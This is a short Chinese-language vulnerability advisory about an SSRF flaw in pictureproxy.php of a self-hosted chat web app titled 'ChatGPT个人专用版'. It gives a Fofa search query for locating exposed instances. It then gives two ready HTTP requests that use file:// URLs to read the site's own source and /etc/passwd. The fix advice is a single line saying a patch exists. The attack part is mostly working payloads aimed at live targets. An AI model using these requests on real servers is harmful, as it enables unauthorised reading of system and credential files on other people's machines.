0x01 漏洞描述:
ChatGPT个人专用版是一种基于人工智能的对话系统,旨在为用户提供个性化的交流体验。它能够理解和生成自然语言,帮助用户解决问题、获取信息或进行创意交流。通过不断学习和优化,ChatGPT个人专用版可以更好地适应用户的需求和偏好,提供更为精准和贴心的服务。其接口pictureproxy.php存在SSRF漏洞,攻击者可通过该漏洞获取系统敏感文件信息。
0x02 搜索语句:
Fofa:title="ChatGPT个人专用版"
0x03 漏洞复现:
宝塔服务网站:
GET /pictureproxy.php?url=file:www/wwwroot/网站路径/pictureproxy.php HTTP/1.1
Host:your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887 Safari/532.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Connection: close
linux服务网站
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887 Safari/532.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Connection: close
0x04 修复建议:
官方已更新补丁,请即时修复。